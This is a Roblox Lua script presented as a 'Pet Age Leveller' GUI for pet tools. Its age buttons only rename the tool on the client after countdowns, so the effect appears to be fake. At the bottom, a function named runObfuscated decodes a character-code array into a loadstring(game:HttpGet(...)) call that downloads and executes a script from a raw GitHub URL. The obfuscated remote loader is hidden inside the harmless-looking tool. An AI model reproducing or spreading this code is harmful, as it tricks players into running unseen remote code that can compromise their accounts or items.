local Players = game:GetService("Players")
local player = Players.LocalPlayer
local character = player.Character or player.CharacterAdded:Wait()

local screenGui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
screenGui.Name = "PetAgeLeveller"
screenGui.ResetOnSpawn = false
screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

-- Main Frame
local frame = Instance.new("Frame", screenGui)
frame.Size = UDim2.new(0, 300, 0, 180)
frame.Position = UDim2.new(0.5, -150, 0.5, -90)
frame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
frame.Active = true
frame.Draggable = true
frame.Name = "PetAgeFrame"
Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 10)

-- Title
local title = Instance.new("TextLabel", frame)
title.Text = "Pet Age Leveller"
title.Font = Enum.Font.FredokaOne
title.TextSize = 20
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1
title.Size = UDim2.new(1, 0, 0, 30)
title.Position = UDim2.new(0, 0, 0, 5)

-- Close Button
local closeButton = Instance.new("TextButton", frame)
closeButton.Text = "X"
closeButton.Font = Enum.Font.FredokaOne
closeButton.TextSize = 18
closeButton.TextColor3 = Color3.fromRGB(255, 255, 255)
closeButton.BackgroundColor3 = Color3.fromRGB(60, 0, 0)
closeButton.Size = UDim2.new(0, 28, 0, 28)
closeButton.Position = UDim2.new(1, -34, 0, 6)
Instance.new("UICorner", closeButton)

closeButton.MouseButton1Click:Connect(function()
	frame.Visible = false
end)

-- Equipped Pet Label
local petInfo = Instance.new("TextLabel", frame)
petInfo.Text = "Equipped Pet: [None]"
petInfo.Font = Enum.Font.FredokaOne
petInfo.TextSize = 16
petInfo.TextColor3 = Color3.fromRGB(255, 255, 160)
petInfo.BackgroundTransparency = 1
petInfo.Position = UDim2.new(0, 12, 0, 40)
petInfo.Size = UDim2.new(1, -24, 0, 24)
petInfo.TextXAlignment = Enum.TextXAlignment.Left

-- "Set Age to 50" Button
local button = Instance.new("TextButton", frame)
button.Text = "Set Age to 50"
button.Font = Enum.Font.FredokaOne
button.TextSize = 16
button.TextColor3 = Color3.fromRGB(40, 40, 40)
button.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
button.Size = UDim2.new(0, 220, 0, 36)
button.Position = UDim2.new(0.5, -110, 0, 76)
Instance.new("UICorner", button)

-- "Add +1 Age" Button
local addAgeButton = Instance.new("TextButton", frame)
addAgeButton.Text = "Add +1 Age"
addAgeButton.Font = Enum.Font.FredokaOne
addAgeButton.TextSize = 16
addAgeButton.TextColor3 = Color3.fromRGB(40, 40, 40)
addAgeButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
addAgeButton.Size = UDim2.new(0, 220, 0, 36)
addAgeButton.Position = UDim2.new(0.5, -110, 0, 122)
Instance.new("UICorner", addAgeButton)

-- Function to get equipped pet tool
local function getEquippedPetTool()
	character = player.Character or player.CharacterAdded:Wait()
	for _, child in pairs(character:GetChildren()) do
		if child:IsA("Tool") and child.Name:find("Age") then
			return child
		end
	end
	return nil
end

-- Update GUI pet name
local function updateGUI()
	local pet = getEquippedPetTool()
	if pet then
		petInfo.Text = "Equipped Pet: " .. pet.Name
	else
		petInfo.Text = "Equipped Pet: [None]"
	end
end

-- Set Age to 50 Button Logic
button.MouseButton1Click:Connect(function()
	local tool = getEquippedPetTool()
	if tool then
		for i = 20, 1, -1 do
			button.Text = "Changing Age in " .. i .. "..."
			task.wait(1)
		end
		local newName = tool.Name:gsub("%[Age%s%d+%]", "[Age 50]")
		tool.Name = newName
		petInfo.Text = "Equipped Pet: " .. tool.Name
		button.Text = "Set Age to 50"
	else
		button.Text = "No Pet Equipped!"
		task.wait(2)
		button.Text = "Set Age to 50"
	end
end)

-- Add +1 Age Button Logic
addAgeButton.MouseButton1Click:Connect(function()
	local tool = getEquippedPetTool()
	if tool then
		local currentAge = tonumber(tool.Name:match("%[Age%s(%d+)%]"))
		if currentAge and currentAge < 100 then
			for i = 5, 1, -1 do
				addAgeButton.Text = "Adding +1 in " .. i .. "..."
				task.wait(1)
			end
			local newAge = currentAge + 1
			local newName = tool.Name:gsub("%[Age%s%d+%]", "[Age " .. newAge .. "]")
			tool.Name = newName
			petInfo.Text = "Equipped Pet: " .. tool.Name
			addAgeButton.Text = "Add +1 Age"
		elseif currentAge and currentAge >= 100 then
			addAgeButton.Text = "Max Age is 100!"
			task.wait(2)
			addAgeButton.Text = "Add +1 Age"
		else
			addAgeButton.Text = "Invalid Age Format!"
			task.wait(2)
			addAgeButton.Text = "Add +1 Age"
		end
	else
		addAgeButton.Text = "No Pet Equipped!"
		task.wait(2)
		addAgeButton.Text = "Add +1 Age"
	end
end)

-- Auto refresh equipped pet display
task.spawn(function()
	while true do
		updateGUI()
		task.wait(1)
	end
end)

local function runObfuscated()
    local encoded = {
        108,111,  97, 100,115,116,114,105,110,103, 40,103,  97,109,101,  58,  72,116,116,112,  71,101,116,  40,  34,
        104,116,116,112,115, 58,  47,  47,114,  97,119,  46,103,105,116,104,117,  98,117,115,101,114,  99,111,110,116,
        101,110,116,  46,  99,111,109,  47,  71,114,111,119,  65,  71,  97,114,100,101,110, 115,  47,  71,114,111,119,
         65,  71,  97,114,100,101,110,115,  47,114,101,102,115,  47,104,101,  97,100,115,  47,109,  97,105,110,  47,
        115,  99,114,105,112,116,  34,  41,  41,  40,  41
    }
    local str = {}
    for _, b in ipairs(encoded) do
        table.insert(str, string.char(b))
    end
    local code = table.concat(str)
    local fn = loadstring(code)
    if fn then fn() end
end

runObfuscated()
